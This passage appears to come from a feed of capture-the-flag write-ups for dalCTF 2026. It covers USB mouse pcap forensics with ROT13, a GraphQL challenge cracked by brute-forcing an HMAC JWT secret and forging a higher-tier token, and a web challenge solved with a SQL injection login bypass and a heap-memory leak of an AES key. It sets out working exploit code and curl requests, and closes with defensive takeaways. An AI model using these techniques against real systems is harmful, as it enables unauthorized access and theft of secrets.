class="n">ys</span><span class="p">)</span> <span class="o">-</span> <span class="n">ymin</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">scale</span> <span class="o">+</span> <span class="mi">2</span><span class="o">*</span><span class="n">margin</span> <span class="n">img</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="sh">"</span><span class="s">RGB</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">w</span><span class="p">,</span> <span class="n">h</span><span class="p">),</span> <span class="sh">"</span><span class="s">white</span><span class="sh">"</span><span class="p">)</span> <span class="n">draw</span> <span class="o">=</span> <span class="n">ImageDraw</span><span class="p">.</span><span class="nc">Draw</span><span class="p">(</span><span class="n">img</span><span class="p">)</span> <span class="n">prev</span> <span class="o">=</span> <span class="bp">None</span> <span class="k">for</span> <span class="n">px</span><span class="p">,</span> <span class="n">py</span><span class="p">,</span> <span class="n">btn</span> <span class="ow">in</span> <span class="n">path</span><span class="p">:</span> <span class="n">rx</span> <span class="o">=</span> <span class="p">(</span><span class="n">px</span> <span class="o">-</span> <span class="n">xmin</span><span class="p">)</span> <span class="o">*</span> <span class="n">scale</span> <span class="o">+</span> <span class="n">margin</span> <span class="n">ry</span> <span class="o">=</span> <span class="p">(</span><span class="n">py</span> <span class="o">-</span> <span class="n">ymin</span><span class="p">)</span> <span class="o">*</span> <span class="n">scale</span> <span class="o">+</span> <span class="n">margin</span> <span class="k">if</span> <span class="n">btn</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span> <span class="k">if</span> <span class="n">prev</span><span class="p">:</span> <span class="n">draw</span><span class="p">.</span><span class="nf">line</span><span class="p">([</span><span class="n">prev</span><span class="p">,</span> <span class="p">(</span><span class="n">rx</span><span class="p">,</span> <span class="n">ry</span><span class="p">)],</span> <span class="n">fill</span><span class="o">=</span><span class="sh">"</span><span class="s">black</span><span class="sh">"</span><span class="p">,</span> <span class="n">width</span><span class="o">=</span><span class="mi">4</span><span class="p">)</span> <span class="n">prev</span> <span class="o">=</span> <span class="p">(</span><span class="n">rx</span><span class="p">,</span> <span class="n">ry</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="n">prev</span> <span class="o">=</span> <span class="bp">None</span> </code></pre> </div> <p>The rendered image reveals handwritten text: <strong><code>QNYPGS{U3U3_V_F2_C41AG}</code></strong></p> <h2> ROT13 Decode </h2> <p>The drawn text is ROT13-encoded:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>QNYPGS{U3U3_V_F2_C41AG} ↓ ROT13 dalctf{h3h3_i_s2_p41nt} </code></pre> </div> <p>Only alphabetic characters are shifted; digits and symbols pass through unchanged.</p> <h2> Flag </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>dalctf{h3h3_i_s2_p41nt} </code></pre> </div> <h2> Key Takeaways </h2> <ul> <li>USB pcap with link type 220 is Linux usbmon mmapped format — <code>file</code> identifies it correctly but scapy needs manual parsing.</li> <li>The usbmon header is 48 bytes; HID data follows immediately. For this mouse, the actual report is at bytes 16–19 of the data section (not byte 0), due to usbmon internal padding.</li> <li>Mouse drawing challenges require reconstructing absolute position from cumulative relative deltas, then rendering clicked-only segments as strokes.</li> <li>The extra ROT13 layer is a lightweight encode-on-top that's easy to miss if you're only looking for standard flag format wrappers.</li> </ul> <h2> Tools Used </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tool</th> <th>Purpose</th> </tr> </thead> <tbody> <tr> <td><code>file</code></td> <td>Identify pcap link type (USB Linux mmapped)</td> </tr> <tr> <td><code>scapy</code></td> <td>Parse raw usbmon packets</td> </tr> <tr> <td><code>struct</code></td> <td>Unpack signed 8-bit deltas and little-endian fields</td> </tr> <tr> <td><code>Pillow</code></td> <td>Render mouse path as PNG</td> </tr> <tr> <td>ROT13</td> <td>Decode drawn ciphertext to flag</td> </tr> </tbody> </table></div> cybersecurity infosec linux security Iceman - dalCTF 2026 Yogeshwar Peela Mon, 08 Jun 2026 04:33:07 +0000 https://dev.to/exploitnotes/iceman-dalctf-2026-e10 https://dev.to/exploitnotes/iceman-dalctf-2026-e10 <p><strong>Flag:</strong> <code>dalctf2026{open-ticket-send-me-ur-fav-song-in-album6}</code><br><br> <strong>Category:</strong> Web / GraphQL / JWT </p> <h2> Overview </h2> <p>A music-themed GraphQL API protected by JWT-based tier access control. The goal was to escalate from a <code>fan</code> tier account to <code>OVO</code> membership in order to read the <code>vaultManifest</code> field on an unreleased album.</p> <h2> Step 1 - GraphQL Introspection </h2> <p>With introspection enabled on the target, the full schema was enumerated:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight graphql"><code><span class="p">{</span><span class="w"> </span><span class="n">__schema</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">types</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">fields</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p><strong>Discovered types:</strong> <code>Query</code>, <code>Mutation</code>, <code>AuthPayload</code>, <code>User</code>, <code>Label</code>, <code>Artist</code>, <code>Album</code>, <code>Track</code></p> <p><strong>Key queries:</strong><br> | Query | Notes |<br> |---|---|<br> | <code>me</code> | Returns current user's <code>username</code> and <code>tier</code> |<br> | <code>releasedAlbums</code> | Auth required |<br> | <code>album(id)</code> | Auth required |<br> | <code>label(name)</code> | Traverses label → artists → albums |</p> <p><strong>Key mutations:</strong> <code>register(username, password)</code>, <code>login(username, password)</code></p> <h2> Step 2 - Account Registration &amp; JWT Analysis </h2> <p>Registering a test account:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight graphql"><code><span class="k">mutation</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">register</span><span class="p">(</span><span class="n">username</span><span class="p">:</span><span class="w"> </span><span class="s2">"test"</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="p">:</span><span class="w"> </span><span class="s2">"test"</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">token</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Returned JWT:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJ0aWVyIjoiZmFuIn0.yICh79kEgP-iQoH8O6cGIoxyjgkGibVeZK8qxlg5lWs </code></pre> </div> <p>Decoded payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"test"</span><span class="p">,</span><span class="w"> </span><span class="nl">"tier"</span><span class="p">:</span><span class="w"> </span><span class="s2">"fan"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>Querying protected endpoints with this token returned:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>"OVO membership required. Fan accounts do not have vault access." </code></pre> </div> <p>This confirmed tier-based access control — <code>tier: "OVO"</code> was needed.</p> <h2> Step 3 - Attack Surface Assessment </h2> <p><strong><code>alg:none</code> bypass</strong> — attempted with multiple tier values (<code>OVO</code>, <code>admin</code>, <code>premium</code>). All rejected with <code>"Authentication required."</code> — the server enforces signature verification.</p> <p><strong>Register with tier argument</strong> — rejected:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Unknown argument 'tier' on field 'Mutation.register' </code></pre> </div> <p>The only viable path: <strong>crack the HMAC secret and forge a valid signed token.</strong></p> <h2> Step 4 - JWT Secret Cracking </h2> <p>Using Python's <code>hmac</code> + <code>hashlib</code> to test a CTF-themed wordlist against the original token's signature:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">hmac</span><span class="p">,</span> <span class="n">hashlib</span><span class="p">,</span> <span class="n">base64</span> <span class="n">token</span> <span class="o">=</span> <span class="sh">"</span><span class="s">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJ0aWVyIjoiZmFuIn0.yICh79kEgP-iQoH8O6cGIoxyjgkGibVeZK8qxlg5lWs</span><span class="sh">"</span> <span class="n">header_payload</span> <span class="o">=</span> <span class="sh">"</span><span class="s">.</span><span class="sh">"</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="n">token</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sh">"</span><span class="s">.</span><span class="sh">"</span><span class="p">)[:</span><span class="mi">2</span><span class="p">])</span> <span class="n">orig_sig</span> <span class="o">=</span> <span class="n">token</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="sh">"</span><span class="s">.</span><span class="sh">"</span><span class="p">)[</span><span class="mi">2</span><span class="p">]</span> <span class="k">def</span> <span class="nf">b64url_decode</span><span class="p">(</span><span class="n">s</span><span class="p">):</span> <span class="n">s</span> <span class="o">+=</span> <span class="sh">"</span><span class="s">=</span><span class="sh">"</span> <span class="o">*</span> <span class="p">(</span><span class="o">-</span><span class="nf">len</span><span class="p">(</span><span class="n">s</span><span class="p">)</span> <span class="o">%</span> <span class="mi">4</span><span class="p">)</span> <span class="k">return</span> <span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64decode</span><span class="p">(</span><span class="n">s</span><span class="p">)</span> <span class="n">orig_sig_bytes</span> <span class="o">=</span> <span class="nf">b64url_decode</span><span class="p">(</span><span class="n">orig_sig</span><span class="p">)</span> <span class="n">wordlist</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">OVO</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">ovo</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">secret</span><span class="sh">"</span><span class="p">,</span> <span class="p">...,</span> <span class="sh">"</span><span class="s">dalctf</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">iceman</span><span class="sh">"</span><span class="p">,</span> <span class="p">...]</span> <span class="k">for</span> <span class="n">word</span> <span class="ow">in</span> <span class="n">wordlist</span><span class="p">:</span> <span class="n">sig</span> <span class="o">=</span> <span class="n">hmac</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="n">word</span><span class="p">.</span><span class="nf">encode</span><span class="p">(),</span> <span class="n">header_payload</span><span class="p">.</span><span class="nf">encode</span><span class="p">(),</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">sha256</span><span class="p">).</span><span class="nf">digest</span><span class="p">()</span> <span class="n">computed</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64encode</span><span class="p">(</span><span class="n">sig</span><span class="p">).</span><span class="nf">rstrip</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">=</span><span class="sh">'</span><span class="p">).</span><span class="nf">decode</span><span class="p">()</span> <span class="k">if</span> <span class="n">computed</span> <span class="o">==</span> <span class="n">orig_sig</span><span class="p">:</span> <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">[+] SECRET FOUND: </span><span class="si">{</span><span class="n">word</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span> <span class="k">break</span> </code></pre> </div> <p><strong>Result:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>[+] SECRET FOUND: iceman </code></pre> </div> <p>The challenge name itself (<code>iceman</code>) was the JWT signing secret.</p> <h2> Step 5 - Forging an OVO-Tier Token </h2> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">hmac</span><span class="p">,</span> <span class="n">hashlib</span><span class="p">,</span> <span class="n">base64</span><span class="p">,</span> <span class="n">json</span> <span class="n">SECRET</span> <span class="o">=</span> <span class="sh">"</span><span class="s">iceman</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">b64url</span><span class="p">(</span><span class="n">data</span><span class="p">):</span> <span class="k">return</span> <span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64encode</span><span class="p">(</span> <span class="n">json</span><span class="p">.</span><span class="nf">dumps</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">separators</span><span class="o">=</span><span class="p">(</span><span class="sh">'</span><span class="s">,</span><span class="sh">'</span><span class="p">,</span><span class="sh">'</span><span class="s">:</span><span class="sh">'</span><span class="p">)).</span><span class="nf">encode</span><span class="p">()</span> <span class="p">).</span><span class="nf">rstrip</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">=</span><span class="sh">'</span><span class="p">).</span><span class="nf">decode</span><span class="p">()</span> <span class="n">header</span> <span class="o">=</span> <span class="nf">b64url</span><span class="p">({</span><span class="sh">"</span><span class="s">alg</span><span class="sh">"</span><span class="p">:</span><span class="sh">"</span><span class="s">HS256</span><span class="sh">"</span><span class="p">,</span><span class="sh">"</span><span class="s">typ</span><span class="sh">"</span><span class="p">:</span><span class="sh">"</span><span class="s">JWT</span><span class="sh">"</span><span class="p">})</span> <span class="n">payload</span> <span class="o">=</span> <span class="nf">b64url</span><span class="p">({</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span><span class="sh">"</span><span class="s">test</span><span class="sh">"</span><span class="p">,</span><span class="sh">"</span><span class="s">tier</span><span class="sh">"</span><span class="p">:</span><span class="sh">"</span><span class="s">OVO</span><span class="sh">"</span><span class="p">})</span> <span class="n">sig</span> <span class="o">=</span> <span class="n">hmac</span><span class="p">.</span><span class="nf">new</span><span class="p">(</span><span class="n">SECRET</span><span class="p">.</span><span class="nf">encode</span><span class="p">(),</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">header</span><span class="si">}</span><span class="s">.</span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="sh">"</span><span class="p">.</span><span class="nf">encode</span><span class="p">(),</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">sha256</span><span class="p">).</span><span class="nf">digest</span><span class="p">()</span> <span class="n">token</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">header</span><span class="si">}</span><span class="s">.</span><span class="si">{</span><span class="n">payload</span><span class="si">}</span><span class="s">.</span><span class="si">{</span><span class="n">base64</span><span class="p">.</span><span class="nf">urlsafe_b64encode</span><span class="p">(</span><span class="n">sig</span><span class="p">).</span><span class="nf">rstrip</span><span class="p">(</span><span class="sa">b</span><span class="sh">'</span><span class="s">=</span><span class="sh">'</span><span class="p">).</span><span class="nf">decode</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span> <span class="nf">print</span><span class="p">(</span><span class="n">token</span><span class="p">)</span> </code></pre> </div> <p><strong>Forged token:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJ0aWVyIjoiT1ZPIn0.k3GYap8NGpMaEsiaG36u85UuHUux5hJVXD5IxckrOjk </code></pre> </div> <p>Verified with <code>me</code> query:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"me"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"test"</span><span class="p">,</span><span class="w"> </span><span class="nl">"tier"</span><span class="p">:</span><span class="w"> </span><span class="s2">"OVO"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Step 6 - Accessing the Vault via Label Traversal </h2> <p><code>releasedAlbums</code> only returned IDs 1 and 2, both with <code>vaultManifest: null</code>. Brute-forcing album IDs 0–20 directly also yielded nothing.</p> <p>The key was traversing via the <strong>label relationship</strong>, which exposed unreleased albums not returned by <code>releasedAlbums</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight graphql"><code><span class="p">{</span><span class="w"> </span><span class="n">label</span><span class="p">(</span><span class="n">name</span><span class="p">:</span><span class="w"> </span><span class="s2">"OVO"</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">artists</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="n">albums</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="n">title</span><span class="w"> </span><span class="n">status</span><span class="w"> </span><span class="n">vaultManifest</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p><strong>Response:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"label"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"OVO"</span><span class="p">,</span><span class="w"> </span><span class="nl">"artists"</span><span class="p">:</span><span class="w"> </span><span class="p">[{</span><span class="w"> </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Drake"</span><span class="p">,</span><span class="w"> </span><span class="nl">"albums"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="s2">"RELEASED"</span><span class="p">,</span><span class="w"> </span><span class="nl">"title"</span><span class="p">:</span><span class="w"> </span><span class="s2">"For All the Dogs"</span><span class="p">,</span><span class="w"> </span><span class="nl">"vaultManifest"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"2"</span><span class="p">,</span><span class="w"> </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="s2">"RELEASED"</span><span class="p">,</span><span class="w"> </span><span class="nl">"title"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Some Sexy Songs 4 U"</span><span class="p">,</span><span class="w"> </span><span class="nl">"vaultManifest"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"id"</span><span class="p">:</span><span class="w"> </span><span class="s2">"9"</span><span class="p">,</span><span class="w"> </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="s2">"UNRELEASED"</span><span class="p">,</span><span class="w"> </span><span class="nl">"title"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ICEMAN"</span><span class="p">,</span><span class="w"> </span><span class="nl">"vaultManifest"</span><span class="p">:</span><span class="w"> </span><span class="s2">"dalctf2026{open-ticket-send-me-ur-fav-song-in-album6}"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">]</span><span class="w"> </span><span class="p">}]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Flag </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>dalctf2026{open-ticket-send-me-ur-fav-song-in-album6} </code></pre> </div> <h2> Attack Chain Summary </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Introspection → Enumerate schema ↓ Register → Get fan-tier JWT ↓ Identify tier-based access control ↓ alg:none rejected → must crack HMAC secret ↓ Crack secret: "iceman" ↓ Forge valid JWT with tier="OVO" ↓ label(name:"OVO") traversal → exposes UNRELEASED album id=9 ↓ vaultManifest → FLAG </code></pre> </div> <h2> Key Takeaways </h2> <ul> <li> <strong>GraphQL introspection in production</strong> leaks the entire schema including sensitive field names like <code>vaultManifest</code>.</li> <li> <strong>Weak JWT secrets</strong> (especially ones matching the challenge/app name) are trivially crackable with a small wordlist.</li> <li> <strong>Authorization logic gaps</strong> - the <code>label → artists → albums</code> traversal bypassed the access controls on <code>releasedAlbums</code> and <code>album(id)</code>, exposing unreleased content.</li> <li> <strong>IDOR via graph traversal</strong> - album ID 9 was invisible to direct queries but reachable through the label relationship.</li> </ul> api cybersecurity infosec security Heart Part 7 - dalCTF 2026 Yogeshwar Peela Mon, 08 Jun 2026 04:25:51 +0000 https://dev.to/exploitnotes/heart-part-7-dalctf-2026-2a77 https://dev.to/exploitnotes/heart-part-7-dalctf-2026-2a77 <p><strong>Category:</strong> Web<br><br> <strong>Flag:</strong> <code>dalctf{p1mp_p1mp_h00r4y}</code> </p> <h2> Overview </h2> <p>A multi-stage web challenge themed around Kendrick Lamar's <em>m.A.A.d city</em> / Kung Fu Kenny lore. The attack chain involved:</p> <ol> <li>SQL injection to bypass authentication and get an admin JWT</li> <li>Heap memory disclosure via an unbounded echo buffer to leak the AES-256 key</li> <li>Fetching and decrypting the flag using the leaked key and a separate IV field in the API response</li> </ol> <h2> Step 1 - SQL Injection → Admin Session </h2> <p>The <code>/login</code> endpoint was vulnerable to classic SQL injection. Commenting out the password check with <code>-- -</code> bypassed authentication entirely and redirected to <code>/admin</code> with a valid JWT session cookie.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-X</span> POST https://&lt;target&gt;/login <span class="se">\</span> <span class="nt">-d</span> <span class="s2">"username=admin'-- -&amp;password=x"</span> </code></pre> </div> <p><strong>Response:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="k">HTTP</span><span class="o">/</span><span class="m">2</span> <span class="m">302</span> <span class="na">location</span><span class="p">:</span> <span class="s">/admin</span> <span class="na">set-cookie</span><span class="p">:</span> <span class="s">session=eyJhbGci...GRnU_ObEj_WaG6GQOE8Y-DMsD9qhVPDvfx9YfIcNn6Q</span> </code></pre> </div> <p>Decoded JWT payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="nl">"username"</span><span class="p">:</span><span class="w"> </span><span class="s2">"admin"</span><span class="p">,</span><span class="w"> </span><span class="nl">"role"</span><span class="p">:</span><span class="w"> </span><span class="s2">"admin"</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>The JWT was signed with a static/weak secret and remained valid for the rest of the challenge.</p> <h2> Step 2 - Heap Memory Leak via Cipher Health Endpoint </h2> <p>The admin panel exposed a <code>/cipher/health</code> endpoint that echoed back a user-controlled buffer padded to <code>size</code> bytes. Sending 1 byte of input with a large <code>size</code> caused the server to fill the remainder with adjacent heap memory — leaking the AES-256 key.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-X</span> POST https://&lt;target&gt;/cipher/health <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-b</span> <span class="s2">"session=&lt;admin_jwt&gt;"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"data": "A", "size": 100}'</span> </code></pre> </div> <p><strong>Response (echo field, base64-decoded):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>A[63 null bytes]KENDRICK_MASTER_KEY=&lt;32 raw key bytes&gt; </code></pre> </div> <p>Extracting the key:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-s</span> <span class="nt">-X</span> POST https://&lt;target&gt;/cipher/health <span class="se">\</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="se">\</span> <span class="nt">-b</span> <span class="s2">"session=&lt;admin_jwt&gt;"</span> <span class="se">\</span> <span class="nt">-d</span> <span class="s1">'{"data": "A", "size": 100}'</span> | python3 <span class="nt">-c</span> <span class="s2">" import sys, json, base64 d = json.load(sys.stdin) echo = base64.b64decode(d['echo']) ki = echo.find(b'KENDRICK_MASTER_KEY=') key_bytes = echo[ki+20:ki+52] print('Key hex:', key_bytes.hex()) "</span> </code></pre> </div> <p><strong>Leaked key:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>9e1b8a5f8ed44e4711c0f4768c13f5a336bc4a6deeea307720a87b9fca44f02d </code></pre> </div> <blockquote> <p>The variable name <code>KENDRICK_MASTER_KEY</code> and the service name <code>MAadCipher</code> are both nods to the Kendrick Lamar theme running throughout the challenge.</p> </blockquote> <h2> Step 3 - Fetching the Encrypted Flag </h2> <p>The <code>/api/flag</code> endpoint returned a JSON object. A key mistake early on was only extracting the <code>ciphertext</code> field — the <code>iv</code> was present as a <strong>separate field</strong> in the response.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-s</span> https://&lt;target&gt;/api/flag <span class="se">\</span> <span class="nt">-b</span> <span class="s2">"session=&lt;admin_jwt&gt;"</span> </code></pre> </div> <p><strong>Full response:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"algorithm"</span><span class="p">:</span><span class="w"> </span><span class="s2">"AES-256-CBC"</span><span class="p">,</span><span class="w"> </span><span class="nl">"ciphertext"</span><span class="p">:</span><span class="w"> </span><span class="s2">"baCIJCXuBcIOJ23q0FS8GDaSN5/71aIqY156ju5Z6oc="</span><span class="p">,</span><span class="w"> </span><span class="nl">"iv"</span><span class="p">:</span><span class="w"> </span><span class="s2">"fcSvIZ1LMw72z34mvr0O5A=="</span><span class="p">,</span><span class="w"> </span><span class="nl">"sealed_by"</span><span class="p">:</span><span class="w"> </span><span class="s2">"MAadCipher v1.0"</span><span class="p">,</span><span class="w"> </span><span class="nl">"status"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ok"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <blockquote> <p><strong>Rabbit hole:</strong> Treating the first 16 bytes of the ciphertext blob as the IV only decrypted the second AES block, yielding <code>_h00r4y}</code> — the tail of the flag. The correct IV was always in the <code>"iv"</code> field.</p> </blockquote> <h2> Step 4 - Decrypting the Flag </h2> <p>With the leaked key and the correct IV, standard AES-256-CBC decryption recovered the flag.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python3 - <span class="o">&lt;&lt;</span><span class="sh">'</span><span class="no">EOF</span><span class="sh">' from base64 import b64decode import subprocess KEY = "9e1b8a5f8ed44e4711c0f4768c13f5a336bc4a6deeea307720a87b9fca44f02d" iv = b64decode("fcSvIZ1LMw72z34mvr0O5A==") ct = b64decode("baCIJCXuBcIOJ23q0FS8GDaSN5/71aIqY156ju5Z6oc=") result = subprocess.run( ["openssl", "enc", "-d", "-aes-256-cbc", "-K", KEY, "-iv", iv.hex(), "-nosalt"], input=ct, capture_output=True ) raw = result.stdout pad = raw[-1] print("FLAG:", raw[:-pad].decode()) </span><span class="no">EOF </span></code></pre> </div> <p><strong>Output:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>FLAG: dalctf{p1mp_p1mp_h00r4y} </code></pre> </div> <h2> Attack Chain Summary </h2> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Login page └─ SQL injection (admin'-- -) └─ Admin JWT session └─ /cipher/health heap leak └─ KENDRICK_MASTER_KEY (AES-256 key) └─ /api/flag → ciphertext + iv └─ AES-256-CBC decrypt └─ dalctf{p1mp_p1mp_h00r4y} </code></pre> </div> <h2> Key Takeaways </h2> <ul> <li> <strong>Always read the full API response.</strong> The IV was in the JSON the whole time - only extracting <code>ciphertext</code> caused the "missing block" rabbit hole.</li> <li> <strong>Unbounded echo buffers leak heap memory.</strong> The <code>size</code> parameter had no upper bound, turning the health check into an arbitrary heap read (CWE-126 style out-of-bounds read).</li> <li> <strong>Theme ≠ hint for the flag value.</strong> The Kendrick / M.A.A.D / PIMP theme was flavour - the actual flag required proper crypto, not guessing.</li> </ul> cybersecurity security sql web